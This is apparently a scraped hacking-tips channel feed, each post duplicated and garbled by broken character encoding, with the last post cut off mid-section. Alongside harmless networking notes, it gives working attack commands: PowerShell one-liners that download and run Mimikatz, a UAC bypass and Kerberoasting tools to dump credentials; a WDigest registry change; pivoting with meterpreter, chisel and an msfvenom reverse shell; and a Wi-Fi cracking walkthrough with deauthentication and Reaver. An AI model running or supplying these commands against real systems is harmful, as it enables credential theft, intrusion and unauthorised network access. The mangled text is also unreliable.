π¦Warning : all windows 10 users Special 2019 version and lower;
should update their Systems β
Xp3 the old system sometimes more secure than Win 10 2019π
should update their Systems β
Xp3 the old system sometimes more secure than Win 10 2019π
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Where Windows Store VNC Passwords ?
#fastTips
VNC passwords in Windows are stored in the registry in the following branches (the list may be incomplete):
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TigerVNC \ WinVNC4
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TightVNC \ Server
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ ORL \ WinVNC3 \ Default
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ RealVNC \ WinVNC4 \
\ HKEY_CURRENT_USER \ Software \ TightVNC
\ HKEY_CURRENT_USER \ Software \ TurboVNC
\ HKEY_CURRENT_USER \ Software \ ORL \ WinVNC3 \ Password
\ HKEY_USERS \ .DEFAULT \ Software \ ORL \ WinVNC3 \ Password
> The password is stored in binary form, its length is 8 bytes.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Where Windows Store VNC Passwords ?
#fastTips
VNC passwords in Windows are stored in the registry in the following branches (the list may be incomplete):
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TigerVNC \ WinVNC4
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ TightVNC \ Server
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ ORL \ WinVNC3 \ Default
\ HKEY_LOCAL_MACHINE \ SOFTWARE \ RealVNC \ WinVNC4 \
\ HKEY_CURRENT_USER \ Software \ TightVNC
\ HKEY_CURRENT_USER \ Software \ TurboVNC
\ HKEY_CURRENT_USER \ Software \ ORL \ WinVNC3 \ Password
\ HKEY_USERS \ .DEFAULT \ Software \ ORL \ WinVNC3 \ Password
> The password is stored in binary form, its length is 8 bytes.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Featuresd for detect a Tcp connections :
> NS - bit 103. ECN-nonce - concealment protection
> CWR (Congestion Window Reduced) - bit 104. Field βCongestion Window Reducedβ - the flag is set by the sender to indicate that a packet has been received with the ECE flag set
> ECE - bit 105. ECE (ECN-Echo) - Field βECN Echoβ - indicates that this node is capable of ECN (explicit notification of congestion) and to indicate to the sender about network congestion (RFC 3168)
> URG - bit 106. The "Importance Index" field is enabled. If set to 0, Urgent Pointer is not used; if set to 1, then Urgent Pointer is used.
>ACK is bit 107. This bit is set for a packet to indicate that this is a response to another packet we received that contains data. A confirmation package is always sent to indicate that we actually received the package and that it does not contain errors. If this bit is set, the original data sender will check the confirmation number to see which packet is actually acknowledged, and then unload it from the buffers.
> PSH - bit 108. The PUSH flag is used to instruct the TCP protocol on any intermediate hosts to send data to the actual user, including the TCP implementation on the receiving host.
>
This will push through all the data, no matter where and how much from the TCP window has already been transmitted.
> RST - bit 109. The RESET flag is set to tell the other end to disconnect the TCP connection. This is done in several different scenarios, the main reasons for which is that the connection was disconnected for some reason, if the connection does not exist or if the packet is somehow wrong.
>SYN - bit 110. SYN (or sequence number synchronization) is used during the initial connection establishment. It is installed in two connection instances: the initial packet that opens the connection, and the response SYN / ACK packet. It should never be used outside of these cases.
> FIN is bit 111. The FIN bit indicates that the host that sent the FIN bit no longer has data to send. When the other end sees the FIN bit, it will reply FIN / ACK. Once this is done, the host that originally sent the FIN bit will no longer be able to send any data. However, the other end may continue to send data until it completes, and then sends the FIN packet back and waits for the final FIN / ACK, after which the connection is sent to the CLOSED state.
written by under code
powered by wiki
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Featuresd for detect a Tcp connections :
> NS - bit 103. ECN-nonce - concealment protection
> CWR (Congestion Window Reduced) - bit 104. Field βCongestion Window Reducedβ - the flag is set by the sender to indicate that a packet has been received with the ECE flag set
> ECE - bit 105. ECE (ECN-Echo) - Field βECN Echoβ - indicates that this node is capable of ECN (explicit notification of congestion) and to indicate to the sender about network congestion (RFC 3168)
> URG - bit 106. The "Importance Index" field is enabled. If set to 0, Urgent Pointer is not used; if set to 1, then Urgent Pointer is used.
>ACK is bit 107. This bit is set for a packet to indicate that this is a response to another packet we received that contains data. A confirmation package is always sent to indicate that we actually received the package and that it does not contain errors. If this bit is set, the original data sender will check the confirmation number to see which packet is actually acknowledged, and then unload it from the buffers.
> PSH - bit 108. The PUSH flag is used to instruct the TCP protocol on any intermediate hosts to send data to the actual user, including the TCP implementation on the receiving host.
>
This will push through all the data, no matter where and how much from the TCP window has already been transmitted.
> RST - bit 109. The RESET flag is set to tell the other end to disconnect the TCP connection. This is done in several different scenarios, the main reasons for which is that the connection was disconnected for some reason, if the connection does not exist or if the packet is somehow wrong.
>SYN - bit 110. SYN (or sequence number synchronization) is used during the initial connection establishment. It is installed in two connection instances: the initial packet that opens the connection, and the response SYN / ACK packet. It should never be used outside of these cases.
> FIN is bit 111. The FIN bit indicates that the host that sent the FIN bit no longer has data to send. When the other end sees the FIN bit, it will reply FIN / ACK. Once this is done, the host that originally sent the FIN bit will no longer be able to send any data. However, the other end may continue to send data until it completes, and then sends the FIN packet back and waits for the final FIN / ACK, after which the connection is sent to the CLOSED state.
written by under code
powered by wiki
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦analyze and reverse engineer Android applications.
F E A T U R E S :
> Displays all extracted files for easy reference
> Automatically decompile APK files to Java and Smali format
>Analyze AndroidManifest.xml for common vulnerabilities and behavior
>Static source code analysis for common vulnerabilities and behavior
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast recievers
Service references
File references
Crypto references
Hardcoded secrets
URL's
Network connections
SSL references
WebView references
-TERMUX / lINUX
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/1N3/ReverseAPK.git
2οΈβ£cd ReverseAPK
3οΈβ£./install
4οΈβ£to use
> reverse-apk <apk_name>
That's all !
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦analyze and reverse engineer Android applications.
F E A T U R E S :
> Displays all extracted files for easy reference
> Automatically decompile APK files to Java and Smali format
>Analyze AndroidManifest.xml for common vulnerabilities and behavior
>Static source code analysis for common vulnerabilities and behavior
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast recievers
Service references
File references
Crypto references
Hardcoded secrets
URL's
Network connections
SSL references
WebView references
-TERMUX / lINUX
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/1N3/ReverseAPK.git
2οΈβ£cd ReverseAPK
3οΈβ£./install
4οΈβ£to use
> reverse-apk <apk_name>
That's all !
ENJOYβ€οΈππ»
β topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - 1N3/ReverseAPK: Quickly analyze and reverse engineer Android packages
Quickly analyze and reverse engineer Android packages - GitHub - 1N3/ReverseAPK: Quickly analyze and reverse engineer Android packages
Forwarded from WEB UNDERCODE - PRIVATE
Wordpress_Plugin_Powie's_WHOIS_Domain_Check_0_9_31_Persistent_Cross.txt
5.3 KB
2020 interesting cve Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting
-Leaked then uploaded to cve site
-Leaked then uploaded to cve site
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Changes of Linux network data forwarding plane-from kernel protocol stack to DPDK/XDP
> To the effect that, with the evolution of IO devices, their access / transmission rate has exceeded the CPU-to-memory storage / transmission rate, could no longer slow peripherals , so, the management of these devices and fast In order to adapt to changes in operation, in this sense, the almost unchanging Linux kernel does hinder performance optimization in many ways.
> This may be the essential reason why people are now turning to DPDK/netmap or XDP. how to say?
In the impression of people, a standard computer contains three major pieces:
1) CPU, the central processing unit.
2) The memory is suspended on a chip similar to the North Bridge.
Peripherals, slow IO devices, are suspended on a chip similar to the South Bridge.
3) This is what we learned in the course "The Principle of Computer Composition". In fact, this is the reality of the computer, so the child, according to von Neumann computer abstract point of view, does not contain computer peripherals, it is only the CPU and memory, emphasizing storage and execution, is stored execution of a computer.
π¦With the actual computer composition, the next step is to design an operating system to manage these things. In fact, almost any operating system can be divided into different modules according to this pile of things:
1) Process management, managing CPU time-sharing and scheduling.
2) Memory management, manage memory allocation.
3) File system to manage file organization.
4) Network protocol stack to manage network IO.
5) Disk drive,...
β¦
π¦In fact, from the beginning, called on the name of the object in addition to the CPU, memory, peripherals (disk is a sense), and connect it to the relatively slow bridge chip, is the assumption behind relative to the CPU and memory, these The IO device is slow.
> Therefore, in order to manage these slow devices, the operating system has to design a complicated mechanism for rate adaptation, data caching, etc., whether it is Unix/Linux or Windows, are designed under this assumption.
However, things are quietly changing, and peripherals are gradually becoming faster and more intelligent. They are almost the same as CPUs. More and more peripherals have built-in memory chips, just like another group of CPU/memory hanging on the same block On the motherboard...
π¦At this time, the operating system should be more suitable as a coordinator, and no longer suitable for continuing to be a manager, but the complex management mechanisms of the old era still exist. Take the network protocol stack as an example:
1) The synchronization overhead of various linked lists in a multi-CPU environment.
2) The non-sleepable soft interrupt path is too long.
3) The allocation and release of sk_buff.
4) Memory copy overhead.
5) Cache miss caused by context switching.
β¦
6) Clearly, these mechanisms slow age 10Mbps / 100Mbps network card is no problem, at that time the application most of the time waiting for the card to send data. Now in the era of 1000Mbps/10Gbps/40Gbps network cards, the reverse is true. The data is quickly received, but it is all blocked in the core.
π¦Therefore, various optimization measures should come with the demand:
1) Network card RSS, multiple queues.
2) Interrupt threading.
3) Split lock granularity.
4) Busypoll.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Changes of Linux network data forwarding plane-from kernel protocol stack to DPDK/XDP
> To the effect that, with the evolution of IO devices, their access / transmission rate has exceeded the CPU-to-memory storage / transmission rate, could no longer slow peripherals , so, the management of these devices and fast In order to adapt to changes in operation, in this sense, the almost unchanging Linux kernel does hinder performance optimization in many ways.
> This may be the essential reason why people are now turning to DPDK/netmap or XDP. how to say?
In the impression of people, a standard computer contains three major pieces:
1) CPU, the central processing unit.
2) The memory is suspended on a chip similar to the North Bridge.
Peripherals, slow IO devices, are suspended on a chip similar to the South Bridge.
3) This is what we learned in the course "The Principle of Computer Composition". In fact, this is the reality of the computer, so the child, according to von Neumann computer abstract point of view, does not contain computer peripherals, it is only the CPU and memory, emphasizing storage and execution, is stored execution of a computer.
π¦With the actual computer composition, the next step is to design an operating system to manage these things. In fact, almost any operating system can be divided into different modules according to this pile of things:
1) Process management, managing CPU time-sharing and scheduling.
2) Memory management, manage memory allocation.
3) File system to manage file organization.
4) Network protocol stack to manage network IO.
5) Disk drive,...
β¦
π¦In fact, from the beginning, called on the name of the object in addition to the CPU, memory, peripherals (disk is a sense), and connect it to the relatively slow bridge chip, is the assumption behind relative to the CPU and memory, these The IO device is slow.
> Therefore, in order to manage these slow devices, the operating system has to design a complicated mechanism for rate adaptation, data caching, etc., whether it is Unix/Linux or Windows, are designed under this assumption.
However, things are quietly changing, and peripherals are gradually becoming faster and more intelligent. They are almost the same as CPUs. More and more peripherals have built-in memory chips, just like another group of CPU/memory hanging on the same block On the motherboard...
π¦At this time, the operating system should be more suitable as a coordinator, and no longer suitable for continuing to be a manager, but the complex management mechanisms of the old era still exist. Take the network protocol stack as an example:
1) The synchronization overhead of various linked lists in a multi-CPU environment.
2) The non-sleepable soft interrupt path is too long.
3) The allocation and release of sk_buff.
4) Memory copy overhead.
5) Cache miss caused by context switching.
β¦
6) Clearly, these mechanisms slow age 10Mbps / 100Mbps network card is no problem, at that time the application most of the time waiting for the card to send data. Now in the era of 1000Mbps/10Gbps/40Gbps network cards, the reverse is true. The data is quickly received, but it is all blocked in the core.
π¦Therefore, various optimization measures should come with the demand:
1) Network card RSS, multiple queues.
2) Interrupt threading.
3) Split lock granularity.
4) Busypoll.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C βIEX (New-Object Net.WebClient).DownloadString(βhttps://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1β);Invoke-AllChecksβ
# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y βNBNS Y βmDNS Y βProxy Y -LogOutput Y -FileOutput Y"
# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C βIEX (New-Object Net.WebClient).DownloadString(βhttps://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1β);Invoke-AllChecksβ
# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y βNBNS Y βmDNS Y βProxy Y -LogOutput Y -FileOutput Y"
# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PORT FORWARDING "port to port":
-Your own :
----MSF----
Most platforms
Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse
----SSH----
For Linux
~C "if you already have an SSH session"
-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to
-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it
For reverse shell:
msfvenom -p linux/x86/shellreversetcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali
Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1
---PLINK----
Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS
---SOCAT----
For linux
Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443
---CHISEL----
Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse
General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:YOUR LOCAL IP:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>
Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
----------------------------------------------------------------------------------------
DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf
----MSF----
Most platforms
Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)
(portscan once created route)
use auxilliary/scanner/portscan/tcp
set RHOSTS IP (pivoting onto thats not part of arpscan you ran)
(if a machine has port 80 and webports, to check it through out machine we have to create a portworward)
portfwd add -l 8001 -p 80 -r IP
(then go to 127.0.0.1:8001)
----SSH----
For Linux
-D1080
---PLINK---
Just like SSH, on Windows
On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
---CHISEL----
Most platforms
On Kali:
./chisel server -p 8000 -reverse
On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
On Kali:
./chisel client 127.0.0.1:8001 socks
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PORT FORWARDING "port to port":
-Your own :
----MSF----
Most platforms
Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse
----SSH----
For Linux
~C "if you already have an SSH session"
-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to
-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it
For reverse shell:
msfvenom -p linux/x86/shellreversetcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali
Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1
---PLINK----
Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS
---SOCAT----
For linux
Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443
---CHISEL----
Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse
General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:YOUR LOCAL IP:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>
Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
----------------------------------------------------------------------------------------
DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf
----MSF----
Most platforms
Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)
(portscan once created route)
use auxilliary/scanner/portscan/tcp
set RHOSTS IP (pivoting onto thats not part of arpscan you ran)
(if a machine has port 80 and webports, to check it through out machine we have to create a portworward)
portfwd add -l 8001 -p 80 -r IP
(then go to 127.0.0.1:8001)
----SSH----
For Linux
-D1080
---PLINK---
Just like SSH, on Windows
On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
---CHISEL----
Most platforms
On Kali:
./chisel server -p 8000 -reverse
On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
On Kali:
./chisel client 127.0.0.1:8001 socks
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WPA2 PSK attack with aircrack-ng suite.
#TipsForBeginers
ifconfig wlan1 # check wireless IFace
sudo airmon-ng check kill # kill issue causing processes
sudo airmon-ng start wlan1 # start monitor mode
sudo airodump-ng wlan1mon # start capturing
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client
sudo aircrack-ng output-01.cap dict # crack the passphrase
WPA PSK attack with aircrack-ng suite.
--------------------------------------
Place your wireless card into Monitor Mode
airmon-ng start wlan0
Detect all available wireless APβs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
Capturing the four-way handshake
airodump-ng --channel <channelnumber> --bssid <bssid> --write capture mon0
You can capture the handshake passively (it takes time) or de-authenticate a client.
De-authentication attack
aireplay-ng --deauth 3 -a <BSSID> -c <clientmac> mon0
Deauth every client - aireplay-ng -0 5 -a <bssid> mon0
Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap
Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
WEP attack with aircrack-ng suite.
----------------------------------
Place your wireless card into Monitor Mode
airmon-ng start wlan0
Detect all available wireless APβs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
aircrack-ng -b (bssid) (file name-01.cap)
Rogue Access Point Testing
--------------------------
# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0
root@backbox:/home/backbox# ifconfig wlan1 down
root@backbox:/home/backbox# iw reg set BO
root@backbox:/home/backbox# ifconfig wlan1 up
root@backbox:/home/backbox# iwconfig wlan1 channel 13
root@backbox:/home/backbox# iwconfig wlan1 txpower 30
root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto
Reaver
------
airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
Pixie WPS
---------
airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1
Wireless Notes
--------------
Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
- Attack:
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
- Remediation:
Use WPA2
Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
Use long-keys
Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES)
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
WPA-Enterprise
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WPA2 PSK attack with aircrack-ng suite.
#TipsForBeginers
ifconfig wlan1 # check wireless IFace
sudo airmon-ng check kill # kill issue causing processes
sudo airmon-ng start wlan1 # start monitor mode
sudo airodump-ng wlan1mon # start capturing
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client
sudo aircrack-ng output-01.cap dict # crack the passphrase
WPA PSK attack with aircrack-ng suite.
--------------------------------------
Place your wireless card into Monitor Mode
airmon-ng start wlan0
Detect all available wireless APβs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
Capturing the four-way handshake
airodump-ng --channel <channelnumber> --bssid <bssid> --write capture mon0
You can capture the handshake passively (it takes time) or de-authenticate a client.
De-authentication attack
aireplay-ng --deauth 3 -a <BSSID> -c <clientmac> mon0
Deauth every client - aireplay-ng -0 5 -a <bssid> mon0
Dictionary Attack
aircrack-ng -w passwords.lst capture-01.cap
Brute force Attack
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap
WEP attack with aircrack-ng suite.
----------------------------------
Place your wireless card into Monitor Mode
